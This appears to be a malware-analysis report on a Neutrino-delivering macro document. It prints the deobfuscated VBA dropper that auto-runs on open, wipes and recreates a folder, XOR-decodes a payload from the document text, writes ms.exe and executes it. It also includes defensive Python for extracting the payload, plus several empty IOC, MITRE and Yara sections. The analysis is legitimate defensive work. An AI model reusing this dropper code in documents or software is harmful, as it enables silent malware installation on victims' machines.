CyberThreatIntel/Additional Analysis/Neutrino/Analysis_2020-02-08.md


2020-02-08 16:30:27 +00:00
# Neutrino physics 101
## Table of Contents
* [Malware analysis](#Malware-analysis)
  + [The initial vector](#Initial)
  + [Loader](#loader)
* [Threat Intelligence](#Intel)
  + [](#Sub_Intel)
* [Cyber kill chain](#Cyber-kill-chain)
* [Indicators Of Compromise (IOC)](#IOC)
* [Yara Rules](#Yara)
* [References MITRE ATT&CK Matrix](#Ref-MITRE-ATTACK)
* [Links](#Links)
  + [Original Tweet](#tweet)
  + [Link Anyrun](#Links-Anyrun)
  + [Resources](#Ressources)
<h2>Malware analysis <a name="Malware-analysis"></a></h2>
<h3>The initial vector<a name="Initial"></a></h3>
<h6>The initial vector is a malicious document using a macro. At first glance, we can note that some constant variables can be replaced and deleted to improve the readability of the code.</h6>
``` VBA
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask = 16515072
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask = 258048
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask = 4032
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask = 63
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask = 16711680
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask = 65280
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask = 255
Private Const MNAJSAQQQQQQ18 = 262144
Private Const MNAJSAQQQQQQ12 = 4096
Private Const MNAJSAQQQQQQ6 = 64
Private Const MNAJSAQQQQQQ8 = 256
Private Const MNAJSAQQQQQQ16 = 65536
```
<h6>We can see the two auto-open entry points that run the macro when the document is opened, one for a Word document (AutoOpen) and one for an Excel workbook (Workbook_Open). Whether this is common code shared by both vectors or a way to reduce the detection rate is hard to say.</h6>
``` VBA
Sub AutoOpen()
    AddSpace
End Sub
Private Sub Workbook_Open()
    AddSpace
End Sub
```
<h6>This uses an intermediate function to execute the main function.</h6>
``` VBA
Sub AddSpace()
    RemoveParagraph
End Sub
```
<h6>The first two functions used by the macro encode and decode Base64, and they are applied in multiple iterations over the data.</h6>
``` VBA
Public Function Encode64(sString As String) As String
    Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte
    Dim var_B As Long, lTrip As Long, iPad As Integer, lLen As Long, i As Long, var_A As Long, lOutSize As Long
    ' Build the Base64 alphabet table (A-Z, a-z, 0-9, +, /)
    For i = 0 To 63
        Select Case i
            Case 0 To 25
                bTrans(i) = 65 + i
            Case 26 To 51
                bTrans(i) = 71 + i
            Case 52 To 61
                bTrans(i) = i - 4
            Case 62
                bTrans(i) = 43
            Case 63
                bTrans(i) = 47
        End Select
    Next i
    ' Shift tables (i << 8 and i << 16) used to assemble each 24-bit group
    For i = 0 To 255
        OOOPOOOOPOOOO8(i) = i * 256
        OOOPOOOOPOOOO16(i) = i * 65536
    Next i
    ' Pad the input with NUL bytes to a multiple of 3
    iPad = Len(sString) Mod 3
    If iPad Then
        iPad = 3 - iPad
        sString = sString & String(iPad, Chr(0))
    End If
    bIn = StrConv(sString, vbFromUnicode)
    lLen = ((UBound(bIn) + 1) \ 3) * 4
    i = lLen \ 72
    lOutSize = ((i * 2) + lLen) - 1
    ReDim bOut(lOutSize)
    lLen = 0
    For var_B = LBound(bIn) To UBound(bIn) Step 3
        lTrip = OOOPOOOOPOOOO16(bIn(var_B)) + OOOPOOOOPOOOO8(bIn(var_B + 1)) + bIn(var_B + 2)
        i = lTrip And 16515072
        bOut(var_A) = bTrans(i \ 262144)
        i = lTrip And 258048
        bOut(var_A + 1) = bTrans(i \ 4096)
        i = lTrip And 4032
        bOut(var_A + 2) = bTrans(i \ 64)
        bOut(var_A + 3) = bTrans(lTrip And 63)
        ' Insert CRLF after every 72 output characters
        If lLen = 68 Then
            bOut(var_A + 4) = 13
            bOut(var_A + 5) = 10
            lLen = 0
            var_A = var_A + 6
        Else
            lLen = lLen + 4
            var_A = var_A + 4
        End If
    Next var_B
    If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2
    ' Replace the characters produced by the NUL padding with '='
    If iPad = 1 Then
        bOut(lOutSize) = 61
    ElseIf iPad = 2 Then
        bOut(lOutSize) = 61
        bOut(lOutSize - 1) = 61
    End If
    Encode64 = StrConv(bOut, vbUnicode)
End Function
Public Function Decrypt(sString As String) As String
    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long
    Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, var_B As Long, var_A As Long, sOut As String
    Dim i As Long
    ' Strip line breaks before decoding
    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)
    i = Len(sString) Mod 4
    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If
    ' Reverse lookup table: Base64 character -> 6-bit value
    For i = 0 To 255
        Select Case i
            Case 65 To 90
                bTrans(i) = i - 65
            Case 97 To 122
                bTrans(i) = i - 71
            Case 48 To 57
                bTrans(i) = i + 4
            Case 43
                bTrans(i) = 62
            Case 47
                bTrans(i) = 63
        End Select
    Next i
    For i = 0 To 63
        OOOPOOOOPOOOO6(i) = i * 64
        OOOPOOOOPOOOO12(i) = i * 4096
        OOOPOOOOPOOOO18(i) = i * 262144
    Next i
    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
    For var_B = 0 To UBound(bIn) Step 4
        lQuad = OOOPOOOOPOOOO18(bTrans(bIn(var_B))) + OOOPOOOOPOOOO12(bTrans(bIn(var_B + 1))) + OOOPOOOOPOOOO6(bTrans(bIn(var_B + 2))) + bTrans(bIn(var_B + 3))
        i = lQuad And 16711680
        bOut(var_A) = i \ 65536
        i = lQuad And 65280
        bOut(var_A + 1) = i \ 256
        bOut(var_A + 2) = lQuad And 255
        var_A = var_A + 3
    Next var_B
    sOut = StrConv(bOut, vbUnicode)
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
    Decrypt = sOut
End Function
```
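As an added example (not code from the original report or from the macro), the Python model below mirrors what the Encode64 / Decrypt pair actually computes, so an analyst can confirm that it is plain Base64 (RFC 4648 alphabet, CRLF after every 72 output characters) and that Decrypt(Encode64(x)) returns x unchanged: the calls wrapped around the path string in the main function are obfuscation only, not encryption. Function names are mine; the use of the ANSI code page for the byte conversion is an assumption about StrConv(..., vbFromUnicode).

```python
"""Added example: Python model of the macro's Encode64 / Decrypt pair.
Not part of the original report; names are the author's own."""
import base64

LINE_WIDTH = 72  # lLen reaches 68 after 17 groups; the 18th group is followed by CRLF


def encode64(data: bytes) -> str:
    """Mirror of Encode64: standard Base64 with a CRLF after every 72 characters.
    As in the macro, an output whose length is an exact multiple of 72 also
    carries a trailing CRLF (lOutSize reserves room for it)."""
    raw = base64.b64encode(data).decode("ascii")
    lines = [raw[i:i + LINE_WIDTH] for i in range(0, len(raw), LINE_WIDTH)]
    out = "\r\n".join(lines)
    if raw and len(raw) % LINE_WIDTH == 0:
        out += "\r\n"
    return out


def decrypt(text: str) -> bytes:
    """Mirror of Decrypt: drop CR/LF, then ordinary Base64 decoding.
    The name is the macro's; nothing is actually encrypted."""
    return base64.b64decode(text.replace("\r", "").replace("\n", ""))


def roundtrip_is_identity(path: str) -> bool:
    """What the dropper evaluates as Decrypt(Encode64(Path)): a no-op.
    Assumption: StrConv(..., vbFromUnicode) yields the ANSI (cp1252) bytes."""
    raw = path.encode("cp1252")
    return decrypt(encode64(raw)) == raw


if __name__ == "__main__":
    # Constructed sample value for the working folder; the real path is
    # built at run time from %ALLUSERSPROFILE%.
    sample = "C:\\ProgramData\\Memsys"
    print(encode64(sample.encode("cp1252")))
    print("identity round-trip:", roundtrip_is_identity(sample))
```

The practical consequence for static analysis is that every `Decrypt(Encode64(Path))` in the macro can be read simply as `Path`, and the "Decrypt" name should not be taken as a sign of a real encryption layer.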
<h6>The next function deletes the existing content: the folder passed as argument is removed if it exists.</h6>
``` VBA
Public Sub Wipedir(path As String)
    Dim ScriptingObj
    Set ScriptingObj = CreateObject("Scripting.FileSystemObject")
    If ScriptingObj.folderexists(path) Then
        ScriptingObj.deletefolder path
    Else
        End
    End If
End Sub
```
<h6>The last functions are the main function and the one that executes the loader. The main function XORs the content of the data with 76 (0x4C), writes it to the All Users profile location and executes the loader.</h6>
``` VBA
Sub RemoveParagraph()
    Dim j As Integer
    Dim Name_Payload As String
    Dim Path As String
    Dim FreeFileSlot As Integer
    Dim para As Paragraph
    Dim i As Long
    Dim data_para As String
    Dim Byte_payload As Byte
    Dim Unknown_Ref As String
    Unknown_Ref = "Startincex"
    ' Working folder under the All Users profile
    Path = Environ("ALLUSERSPROFILE") + "\Memsys"
    If Len(dir(Path, vbDirectory)) = 0 Then
        MkDir (Decrypt(Encode64(Path)))  ' Decrypt(Encode64(x)) is just x
    Else:
        Wipedir (Path)
        MkDir (Decrypt(Encode64(Path)))
    End If
    Name_Payload = "ms.exe"
    ChDrive (Path)
    ChDir (Decrypt(Encode64(Path)))
    FreeFileSlot = FreeFile()
    Open Name_Payload For Binary As FreeFileSlot
    j = 0
    ' The payload is stored as hex text in the document body, from paragraph 24 onward
    For Each para In ActiveDocument.Paragraphs
        DoEvents
        data_para = para.Range.Text
        i = 1
        j = j + 1
        If j >= 24 Then
            While (i < Len(data_para))
                Byte_payload = "&H" & Mid(data_para, i, 2)
                Byte_payload = Byte_payload Xor &H4C ' Xor 76
                Put #FreeFileSlot, , Byte_payload
                i = i + 2
            Wend
        End If
    Next
    Close #FreeFileSlot
    Exec (Name_Payload)
End Sub
Sub Exec(Name_Payload0 As String)
    Dim Path As String
    Dim OBsGG
    Path = Environ("ALLUSERSPROFILE") + "\Memsys"
    ChDrive (Path)
    ChDir (Decrypt(Encode64(Path)))
    OBsGG = Shell((Path + "\ms.exe"), 1)
End Sub
```
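The following is an added example, not code from the original report: a static re-implementation of the payload reconstruction that RemoveParagraph performs, so the dropped executable can be recovered from a sample for hashing and further analysis without executing the macro. It assumes the paragraph text has already been dumped from the document (the paragraph list used here is constructed for illustration, not taken from a real sample); the XOR key 0x4C and the "from paragraph 24 onward" rule come from the macro. Function names are mine.

```python
"""Added example: recover the XOR-ed hex payload from the document body the
way RemoveParagraph does, without running the macro.  Not part of the original
report; the fixture document below is constructed, not a real sample."""
import hashlib
from typing import List

XOR_KEY = 0x4C                 # Byte_payload Xor &H4C in the macro
FIRST_PAYLOAD_PARAGRAPH = 24   # the macro starts emitting bytes when j >= 24


def decode_paragraph(text: str) -> bytes:
    """Mirror of the inner While loop: read the paragraph as 2-char hex pairs and
    XOR each byte with the key.  Whitespace and Word's paragraph mark ('\\r') are
    dropped first, which is what the 'i < Len(data_para)' bound achieves in VBA."""
    hexdata = "".join(text.split())
    if len(hexdata) % 2:
        # The macro would feed a lone trailing character to "&H"; treat as malformed.
        raise ValueError("odd-length hex paragraph")
    return bytes(b ^ XOR_KEY for b in bytes.fromhex(hexdata))


def extract_payload(paragraphs: List[str]) -> bytes:
    """Concatenate the decoded bytes of paragraphs 24, 25, ... (1-based, like j)."""
    out = bytearray()
    for j, text in enumerate(paragraphs, start=1):
        if j >= FIRST_PAYLOAD_PARAGRAPH and text.strip():
            out += decode_paragraph(text)
    return bytes(out)


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on the recovered file: a PE starts with 'MZ'."""
    return blob[:2] == b"MZ"


def sha256_hex(blob: bytes) -> str:
    """Hash of the recovered file, for IOC tracking."""
    return hashlib.sha256(blob).hexdigest()


# ---- constructed fixture (not a real sample) --------------------------------
def build_document(payload: bytes, chunk: int = 16) -> List[str]:
    """Lay out a paragraph list the way the dropper document does: 23 decoy text
    paragraphs, then the payload as XOR-ed upper-case hex, `chunk` bytes per
    paragraph, each paragraph ending in Word's '\\r' mark."""
    paras = [f"Decoy paragraph {n}\r" for n in range(1, FIRST_PAYLOAD_PARAGRAPH)]
    enc = bytes(b ^ XOR_KEY for b in payload)
    for i in range(0, len(enc), chunk):
        paras.append(enc[i:i + chunk].hex().upper() + "\r")
    return paras


# Constructed stand-in for the dropped file; only the 'MZ' header is realistic.
FAKE_PAYLOAD = b"MZ\x90\x00" + b"constructed stand-in, not a real executable\x00"

if __name__ == "__main__":
    doc = build_document(FAKE_PAYLOAD)
    blob = extract_payload(doc)
    print(len(blob), "bytes recovered; MZ header:", looks_like_pe(blob))
    print("sha256:", sha256_hex(blob))
```

On a real sample, replace `build_document(...)` with the paragraph text dumped from the .doc (for example with a Word object-model script or an OOXML/OLE parser) and check that the recovered bytes start with `MZ` before submitting the hash to the IOC list.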
<h2>Threat Intelligence <a name="Intel"></a></h2>
<h2> Cyber kill chain <a name="Cyber-kill-chain"></a></h2>
<h6>The process graph summarises the cyber kill chain used by the attacker:</h6>
<p align="center">
<img src="https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Additional%20Analysis/Neutrino/Pictures/cyberkill.PNG">
</p>
<h2> Indicators Of Compromise (IOC) <a name="IOC"></a></h2>
<h6> List of all the Indicators Of Compromise (IOC)</h6>
|Indicator|Description|
| ------------- |:-------------:|
<h6> The IOC can be exported in <a href="">JSON</a></h6>
<h2> References MITRE ATT&CK Matrix <a name="Ref-MITRE-ATTACK"></a></h2>
|Enterprise tactics|Techniques used|Ref URL|
| :---------------: |:-------------| :------------- |
<h6> This can be exported as JSON format <a href=""></a></h6>
<h2>Yara Rules<a name="Yara"></a></h2>
<h6> YARA Rules are available <a href="">here</a></h6>
<h2>Links <a name="Links"></a></h2>
<h6> Original tweet: </h6><a name="tweet"></a>
* [https://twitter.com/JAMESWT_MHT/status/1225796259845414912](https://twitter.com/JAMESWT_MHT/status/1225796259845414912)
<h6> Links Anyrun: <a name="Links-Anyrun"></a></h6>
* [impor.doc](https://app.any.run/tasks/454fe6a2-e2d0-4fa3-ba1d-78e2c7372ddd)
<h6> Resources: </h6><a name="Ressources"></a>
* [Encode64 / Decode64 in VB.NET](https://stackoverflow.com/questions/12879661/encode64-decode64-in-vb-net)
* [New Neutrino Bot comes in a protective loader](https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/)
* [URLhaus Neutrino](https://urlhaus.abuse.ch/browse/tag/Neutrino/)
* [VB2019 paper: Rich Headers: leveraging this mysterious artifact of the PE format](https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/)